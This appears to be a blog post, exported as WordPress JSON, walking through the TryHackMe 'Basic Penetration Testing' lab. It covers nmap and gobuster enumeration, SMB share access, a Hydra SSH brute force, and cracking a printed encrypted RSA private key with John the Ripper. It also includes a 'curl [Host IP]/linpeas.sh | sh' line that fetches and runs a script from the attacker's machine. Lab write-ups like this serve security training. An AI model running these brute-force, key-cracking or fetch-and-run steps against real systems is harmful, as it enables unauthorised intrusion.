{"id":205,"date":"2023-04-10T23:09:28","date_gmt":"2023-04-11T04:09:28","guid":{"rendered":"https:\/\/binaryblisters.com\/?p=205"},"modified":"2023-04-14T15:34:16","modified_gmt":"2023-04-14T20:34:16","slug":"thm-basic-penetration-testing","status":"publish","type":"post","link":"https:\/\/binaryblisters.com\/?p=205","title":{"rendered":"Try Hack Me- Basic Penetration Testing"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"245\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-10-1024x245.png\" alt=\"\" class=\"wp-image-206\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-10-1024x245.png 1024w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-10-300x72.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-10-768x183.png 768w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-10-1536x367.png 1536w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-10-2048x489.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I decided to start working on some of THM&#8217;s machines. I did the <a href=\"https:\/\/binaryblisters.com\/?p=164\">Pickle Rick Machine<\/a> a little while ago which was fun so I figured I would give the other ones a shot. What better way than to start with the first and easiest (supposedly)? Overall, it was good. It makes me realize I still have a lot to learn but practice makes perfect.<\/p>\n\n\n\n<p>Here is the link to my <a href=\"https:\/\/sgtdiddlywink.gitbook.io\/thm\/\">original notes<\/a> for the labs in case anyone is interested in my thought process. This write-up will be more of a straightforward approach to how I tackled the lab. <\/p>\n\n\n\n<p>So let&#8217;s get started.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 1: Discover what services are running on the machine.<\/h2>\n\n\n\n<p>The first step is pretty easy, just run a simple nmap scan.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap &#91;Target URL]<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"697\" height=\"333\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-11.png\" alt=\"\" class=\"wp-image-207\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-11.png 697w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-11-300x143.png 300w\" sizes=\"auto, (max-width: 697px) 100vw, 697px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Task 2: What is the name of the hidden directory on the web server?<\/h2>\n\n\n\n<p>Since Port 80 is open, it&#8217;s usually an indicator that a web server is running. Visiting the URL takes us to an &#8220;Under Construction&#8221; webpage. Let&#8217;s run a gobuster enumeration on the page to try to discover some other directories.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>gobuster dir -u http:\/\/&#91;Target_IP]:&#91;Port]\/ -w &#91;Path to word list]<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"981\" height=\"882\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-12.png\" alt=\"\" class=\"wp-image-208\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-12.png 981w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-12-300x270.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-12-768x690.png 768w\" sizes=\"auto, (max-width: 981px) 100vw, 981px\" \/><\/figure>\n\n\n\n<p>The &#8220;<strong>\/index<\/strong>&#8221; page is just the home page that is under construction. The other directories have a 403 code which means they are forbidden to access. That leaves us with one directory left &#8220;<strong>\/development<\/strong>&#8220;.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"995\" height=\"366\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-13.png\" alt=\"\" class=\"wp-image-209\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-13.png 995w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-13-300x110.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-13-768x283.png 768w\" sizes=\"auto, (max-width: 995px) 100vw, 995px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Task 3: Use Brute forcing to find the username and password.<\/h2>\n\n\n\n<p>So I didn&#8217;t brute force the usernames. Since I had access to quite a few files from the directory we found above and some other services from the nmap scan, I decided to do some snooping.<\/p>\n\n\n\n<p>I started by exploring the two files from the directory above.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"312\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-14-1024x312.png\" alt=\"\" class=\"wp-image-210\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-14-1024x312.png 1024w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-14-300x91.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-14-768x234.png 768w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-14.png 1109w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"268\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-15-1024x268.png\" alt=\"\" class=\"wp-image-211\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-15-1024x268.png 1024w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-15-300x79.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-15-768x201.png 768w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-15.png 1100w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Three useful bits of information.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>There are two possible usernames that start with J &amp; K.<\/li>\n\n\n\n<li>SMB has been configured. This lines up with the service running on Port 445 from the scan above.<\/li>\n\n\n\n<li>User &#8220;J&#8221; has weak credentials. A good indication of which user we are going to try brute forcing.<\/li>\n<\/ul>\n\n\n\n<p>Let&#8217;s start with exploring SMB on Port 445.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>smbclient -L &#91;Target URL]<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"878\" height=\"207\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-16.png\" alt=\"\" class=\"wp-image-212\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-16.png 878w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-16-300x71.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-16-768x181.png 768w\" sizes=\"auto, (max-width: 878px) 100vw, 878px\" \/><\/figure>\n\n\n\n<p>It shows that an Anonymous Share is available. Let&#8217;s take a look in there as this share tends to be available without credentials.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>smbclient \/\/&#91;Target URL]\/Anonymous<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"790\" height=\"248\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-17.png\" alt=\"\" class=\"wp-image-213\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-17.png 790w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-17-300x94.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-17-768x241.png 768w\" sizes=\"auto, (max-width: 790px) 100vw, 790px\" \/><\/figure>\n\n\n\n<p>It looks like there is a file in there that we can grab and take a look at it.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>get staff.txt<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"938\" height=\"179\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-18.png\" alt=\"\" class=\"wp-image-214\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-18.png 938w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-18-300x57.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-18-768x147.png 768w\" sizes=\"auto, (max-width: 938px) 100vw, 938px\" \/><\/figure>\n\n\n\n<p>If we &#8220;cat&#8221; this file out it gives us the first bit of information we were looking for. Two names, &#8220;<strong>Jan<\/strong>&#8221; and &#8220;<strong>Kay<\/strong>&#8220;.<\/p>\n\n\n\n<p>For the time being, let&#8217;s assume that these are possible usernames on the system.<\/p>\n\n\n\n<p>Now that we have a couple of possible usernames let&#8217;s see what we can do with those. Based on our first nmap scan, we found that SSH is running on Port 22. If these are usernames, it&#8217;s a pretty good chance that we may be able log into them from Port 22.<\/p>\n\n\n\n<p>If we try logging in to SSH with Jan, we quickly find that we need a password. So let&#8217;s give our good friend Hydra a tryout. I had to look up a hint on this one. I was a little hyper-focused on the SMB server and originally forgot about Port 22. Good reminder to myself to back up sometimes and see what other possible routes I can take.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hydra -V -l jan -P &#91;password list] ssh:\/\/&#91;Target IP]<\/code><\/pre>\n\n\n\n<p>I used the rockyou password file which was overkill and took a bit of time but eventually came up with a password for the user. Per the <strong>\/development<\/strong> directory word files, it appears that Jan&#8217;s credentials are pretty weak.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1001\" height=\"203\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-19.png\" alt=\"\" class=\"wp-image-215\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-19.png 1001w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-19-300x61.png 300w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-19-768x156.png 768w\" sizes=\"auto, (max-width: 1001px) 100vw, 1001px\" \/><\/figure>\n\n\n\n<p>Now we have a password of &#8220;<strong>armando<\/strong>&#8220;.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 4: What is a username?<\/h2>\n\n\n\n<p>We already figured that out from the previous. <\/p>\n\n\n\n<p><strong>Jan<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 5: What is the password?<\/h2>\n\n\n\n<p>Same as before, we already figured this out from the previous task.<\/p>\n\n\n\n<p><strong>armando<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 6: What service do you use to access the server?<\/h2>\n\n\n\n<p>Luckily for us, we also figured this out from Task 3.<\/p>\n\n\n\n<p><strong>SSH<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 7: Enumerate the machine to find any versions for privilege escalation.<\/h2>\n\n\n\n<p>Before I ran any enumeration scripts, I decided to just explore myself. I really enjoy this part once I get access to a machine. It&#8217;s fun to run around a system and see what opportunities are possible.<\/p>\n\n\n\n<p>Exploring the system gave me a lot of good info but I decided to start by focusing on Kay&#8217;s file. Listing out their files (including the hidden ones) gave me a lot of good information.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"679\" height=\"357\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-20.png\" alt=\"\" class=\"wp-image-216\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-20.png 679w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-20-300x158.png 300w\" sizes=\"auto, (max-width: 679px) 100vw, 679px\" \/><\/figure><\/div>\n\n\n<p>Most of this, we can&#8217;t do a whole lot with but the important file in there is in the <strong>.ssh<\/strong> directory.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"572\" height=\"186\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-21.png\" alt=\"\" class=\"wp-image-217\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-21.png 572w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-21-300x98.png 300w\" sizes=\"auto, (max-width: 572px) 100vw, 572px\" \/><\/figure><\/div>\n\n\n<p>It looks like Kay has both the private and public keys saved on their machine. That is a big no-no. <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>-----BEGIN RSA PRIVATE KEY-----\r\nProc-Type: 4,ENCRYPTED\r\nDEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75\r\n\r\nIoNb\/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ\r\no9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN\r\nXRvjw\/HRiGcXPY8B7nsA1eiPYrPZHIH3QOFIYlSPMYv79RC65i6frkDSvxXzbdfX\r\nAkAN+3T5FU49AEVKBJtZnLTEBw31mxjv0lLXAqIaX5QfeXMacIQOUWCHATlpVXmN\r\nlG4BaG7cVXs1AmPieflx7uN4RuB9NZS4Zp0lplbCb4UEawX0Tt+VKd6kzh+Bk0aU\r\nhWQJCdnb\/U+dRasu3oxqyklKU2dPseU7rlvPAqa6y+ogK\/woTbnTrkRngKqLQxMl\r\nlIWZye4yrLETfc275hzVVYh6FkLgtOfaly0bMqGIrM+eWVoXOrZPBlv8iyNTDdDE\r\n3jRjqbOGlPs01hAWKIRxUPaEr18lcZ+OlY00Vw2oNL2xKUgtQpV2jwH04yGdXbfJ\r\nLYWlXxnJJpVMhKC6a75pe4ZVxfmMt0QcK4oKO1aRGMqLFNwaPxJYV6HauUoVExN7\r\nbUpo+eLYVs5mo5tbpWDhi0NRfnGP1t6bn7Tvb77ACayGzHdLpIAqZmv\/0hwRTnrb\r\nRVhY1CUf7xGNmbmzYHzNEwMppE2i8mFSaVFCJEC3cDgn5TvQUXfh6CJJRVrhdxVy\r\nVqVjsot+CzF7mbWm5nFsTPPlOnndC6JmrUEUjeIbLzBcW6bX5s+b95eFeceWMmVe\r\nB0WhqnPtDtVtg3sFdjxp0hgGXqK4bAMBnM4chFcK7RpvCRjsKyWYVEDJMYvc87Z0\r\nysvOpVn9WnFOUdON+U4pYP6PmNU4Zd2QekNIWYEXZIZMyypuGCFdA0SARf6\/kKwG\r\noHOACCK3ihAQKKbO+SflgXBaHXb6k0ocMQAWIOxYJunPKN8bzzlQLJs1JrZXibhl\r\nVaPeV7X25NaUyu5u4bgtFhb\/f8aBKbel4XlWR+4HxbotpJx6RVByEPZ\/kViOq3S1\r\nGpwHSRZon320xA4hOPkcG66JDyHlS6B328uViI6Da6frYiOnA4TEjJTPO5RpcSEK\r\nQKIg65gICbpcWj1U4I9mEHZeHc0r2lyufZbnfYUr0qCVo8+mS8X75seeoNz8auQL\r\n4DI4IXITq5saCHP4y\/ntmz1A3Q0FNjZXAqdFK\/hTAdhMQ5diGXnNw3tbmD8wGveG\r\nVfNSaExXeZA39jOgm3VboN6cAXpz124Kj0bEwzxCBzWKi0CPHFLYuMoDeLqP\/NIk\r\noSXloJc8aZemIl5RAH5gDCLT4k67wei9j\/JQ6zLUT0vSmLono1IiFdsMO4nUnyJ3\r\nz+3XTDtZoUl5NiY4JjCPLhTNNjAlqnpcOaqad7gV3RD\/asml2L2kB0UT8PrTtt+S\r\nbaXKPFH0dHmownGmDatJP+eMrc6S896+HAXvcvPxlKNtI7+jsNTwuPBCNtSFvo19\r\nl9+xxd55YTVo1Y8RMwjopzx7h8oRt7U+Y9N\/BVtbt+XzmYLnu+3qOq4W2qOynM2P\r\nnZjVPpeh+8DBoucB5bfXsiSkNxNYsCED4lspxUE4uMS3yXBpZ\/44SyY8KEzrAzaI\r\nfn2nnjwQ1U2FaJwNtMN5OIshONDEABf9Ilaq46LSGpMRahNNXwzozh+\/LGFQmGjI\r\nI\/zN\/2KspUeW\/5mqWwvFiK8QU38m7M+mli5ZX76snfJE9suva3ehHP2AeN5hWDMw\r\nX+CuDSIXPo10RDX+OmmoExMQn5xc3LVtZ1RKNqono7fA21CzuCmXI2j\/LtmYwZEL\r\nOScgwNTLqpB6SfLDj5cFA5cdZLaXL1t7XDRzWggSnCt+6CxszEndyUOlri9EZ8XX\r\noHhZ45rgACPHcdWcrKCBfOQS01hJq9nSJe2W403lJmsx\/U3YLauUaVgrHkFoejnx\r\nCNpUtuhHcVQssR9cUi5it5toZ+iiDfLoyb+f82Y0wN5Tb6PTd\/onVDtskIlfE731\r\nDwOy3Zfl0l1FL6ag0iVwTrPBl1GGQoXf4wMbwv9bDF0Zp\/6uatViV1dHeqPD8Otj\r\nVxfx9bkDezp2Ql2yohUeKBDu+7dYU9k5Ng0SQAk7JJeokD7\/m5i8cFwq\/g5VQa8r\r\nsGsOxQ5Mr3mKf1n\/w6PnBWXYh7n2lL36ZNFacO1V6szMaa8\/489apbbjpxhutQNu\r\nEu\/lP8xQlxmmpvPsDACMtqA1IpoVl9m+a+sTRE2EyT8hZIRMiuaaoTZIV4CHuY6Q\r\n3QP52kfZzjBt3ciN2AmYv205ENIJvrsacPi3PZRNlJsbGxmxOkVXdvPC5mR\/pnIv\r\nwrrVsgJQJoTpFRShHjQ3qSoJ\/r\/8\/D1VCVtD4UsFZ+j1y9kXKLaT\/oK491zK8nwG\r\nURUvqvBhDS7cq8C5rFGJUYD79guGh3He5Y7bl+mdXKNZLMlzOnauC5bKV4i+Yuj7\r\nAGIExXRIJXlwF4G0bsl5vbydM55XlnBRyof62ucYS9ecrAr4NGMggcXfYYncxMyK\r\nAXDKwSwwwf\/yHEwX8ggTESv5Ad+BxdeMoiAk8c1Yy1tzwdaMZSnOSyHXuVlB4Jn5\r\nphQL3R8OrZETsuXxfDVKrPeaOKEE1vhEVZQXVSOHGCuiDYkCA6al6WYdI9i2+uNR\r\nogjvVVBVVZIBH+w5YJhYtrInQ7DMqAyX1YB2pmC+leRgF3yrP9a2kLAaDk9dBQcV\r\nev6cTcfzhBhyVqml1WqwDUZtROTwfl80jo8QDlq+HE0bvCB\/o2FxQKYEtgfH4\/UC\r\nD5qrsHAK15DnhH4IXrIkPlA799CXrhWi7mF5Ji41F3O7iAEjwKh6Q\/YjgPvgj8LG\r\nOsCP\/iugxt7u+91J7qov\/RBTrO7GeyX5Lc\/SW1j6T6sjKEga8m9fS10h4TErePkT\r\nt\/CCVLBkM22Ewao8glguHN5VtaNH0mTLnpjfNLVJCDHl0hKzi3zZmdrxhql+\/WJQ\r\n4eaCAHk1hUL3eseN3ZpQWRnDGAAPxH+LgPyE8Sz1it8aPuP8gZABUFjBbEFMwNYB\r\ne5ofsDLuIOhCVzsw\/DIUrF+4liQ3R36Bu2R5+kmPFIkkeW1tYWIY7CpfoJSd74VC\r\n3Jt1\/ZW3XCb76R75sG5h6Q4N8gu5c\/M0cdq16H9MHwpdin9OZTqO2zNxFvpuXthY\r\n-----END RSA PRIVATE KEY-----<\/code><\/pre>\n\n\n\n<p>Here is where I learned that I can log into SSH with a private key which is really cool. I started by creating a new file on my host machine.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nano id_rsa.pem<\/code><\/pre>\n\n\n\n<p>I copy and pasted the private key into this file, saved it, and exited. Next, I tried logging into the SSH server with the private key.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssh -i id_rsa.pem kay@&#91;Target IP]<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"466\" height=\"145\" src=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-22.png\" alt=\"\" class=\"wp-image-218\" srcset=\"https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-22.png 466w, https:\/\/binaryblisters.com\/wp-content\/uploads\/2023\/04\/image-22-300x93.png 300w\" sizes=\"auto, (max-width: 466px) 100vw, 466px\" \/><\/figure><\/div>\n\n\n<p>Unfortunately, it looks like I need a passphrase to continue to log in. This is great information and we&#8217;ll come back to it later but let&#8217;s get back to the task at hand.<\/p>\n\n\n\n<p>Let&#8217;s get back to focusing on the task of enumerating the machine.<\/p>\n\n\n\n<p>Start by downloading <a href=\"https:\/\/github.com\/carlospolop\/PEASS-ng\/tree\/master\/linPEAS\">linPEAS<\/a> if you don&#8217;t already have it installed.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>wget \"https:\/\/github.com\/carlospolop\/PEASS-ng\/releases\/latest\/download\/linpeas.sh\" -O linpeas.sh<\/code><\/pre>\n\n\n\n<p>This will download the file and save the output to <strong>linpeas.sh<\/strong>. Next is to start up a Python web server from the directory that you downloaded linPEAS to on your host machine.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo python3 -m http.server 80<\/code><\/pre>\n\n\n\n<p>On the target machine (Ensure you are currently SSH&#8217;d into Jan&#8217;s account) run the following:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl &#91;Host IP]\/linpeas.sh | sh<\/code><\/pre>\n\n\n\n<p>This will grab the <strong>linpeas.sh<\/strong> file from your web server and run it on the target machine. This will output a ton of good information in an easy-to-read format. This is where I discovered a vulnerability in the machine (CVE 2021-4034) and it also outputted the private keys I previously discovered.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 8: What is the name of the other user?<\/h2>\n\n\n\n<p>This should be pretty easy since we already discovered this from a previous task.<\/p>\n\n\n\n<p><strong>Kay<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 9: If you found this user, what can you do with this information?<\/h2>\n\n\n\n<p>Well honestly, a lot. But I think they are getting at lateral movement in the system. In this case, Kay has a lot of root privileges, so it would be worth it to try to gain access to their account.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Task 10: What is the final password you obtain?<\/h2>\n\n\n\n<p>Let&#8217;s jump back to <strong>Task 7<\/strong> from above. <\/p>\n\n\n\n<p>I needed my second hint here as I had no idea what to do about the passphrase to Kay&#8217;s account. I spent a couple of hours but was looking in all the wrong places. Turns out our buddy <a href=\"https:\/\/github.com\/openwall\/john\">John<\/a> (not <a href=\"https:\/\/www.youtube.com\/channel\/UCVeW9qkBjo3zosnqUbG7CFw\">John Hammond<\/a>) is here to help us out.<\/p>\n\n\n\n<p>I learned that we can actually obtain the passphrase from the private key. Pending the passphrase is something relatively simple. To do this, we will use <a href=\"https:\/\/github.com\/openwall\/john\">John the Ripper<\/a>. The first step is to convert the private key file from above, <strong>id_rsa.pem<\/strong>, to a format that John can try to crack.<\/p>\n\n\n\n<p>Start by downloading the file <strong><a href=\"https:\/\/github.com\/openwall\/john\/blob\/bleeding-jumbo\/run\/ssh2john.py\">ssh2john.py<\/a><\/strong> to a file on your host machine if you don&#8217;t already have it.<\/p>\n\n\n\n<p>Next is to run the <strong>id_rsa.pem<\/strong> file through the Python Script.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 &#91;File path to ssh2john.py] &#91;File path to id_rsa.pem] > john.txt<\/code><\/pre>\n\n\n\n<p>This will output a new file called &#8220;<strong>john.txt<\/strong>&#8221; which John the Ripper can read and try to extract a passphrase from.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>john &#91;Path to the <strong>john.txt<\/strong> file] --wordlist=&#91;Path to wordlist you want to use]<\/code><\/pre>\n\n\n\n<p>Running this through the John the Ripper will output a passphrase at the end of &#8220;<strong>beeswax<\/strong>&#8216;. Let&#8217;s give that a try now.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssh -i &#91;Path to private key] kay@&#91;Target IP]<\/code><\/pre>\n\n\n\n<p>When prompted for the passphrase, input <strong>beeswax<\/strong> and you should now be logged into Kay&#8217;s account.<\/p>\n\n\n\n<p>Stroll on over to Kay&#8217;s user account and cat the backup file:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cat \/home\/kay\/pass.bak<\/code><\/pre>\n\n\n\n<p>This will output:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>heresareallystrongpasswordthatfollowsthepasswordpolicy$$<\/code><\/pre>\n\n\n\n<p>And that is it. Nothing more to it.<\/p>\n\n\n\n<p>I needed two hints to get through this lab but as everyone says, practice makes perfect. I&#8217;ll try taking a crack at another lab tomorrow and will follow up with a write-up a day or two afterward so keep your eyes open for it.<\/p>\n\n\n\n<p>As always, thanks for reading and catch you all later.<\/p>\n\n\n\n<p>-sgtdiddlywink<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I decided to start working on some of THM&#8217;s machines. I did the Pickle Rick Machine a little while ago which was fun so I figured I would give the other ones a shot. What better way than to start with the first and easiest (supposedly)? Overall, it was good. It makes me realize I [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":219,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[48,49],"tags":[63,18,65,62,64,61,60,51],"class_list":["post-205","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hacking","category-thm","tag-gobuster","tag-hacking","tag-hydra","tag-john-the-ripper","tag-nmap","tag-smb","tag-ssh","tag-thm"],"_links":{"self":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts\/205","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=205"}],"version-history":[{"count":2,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts\/205\/revisions"}],"predecessor-version":[{"id":255,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts\/205\/revisions\/255"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/media\/219"}],"wp:attachment":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=205"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=205"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=205"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}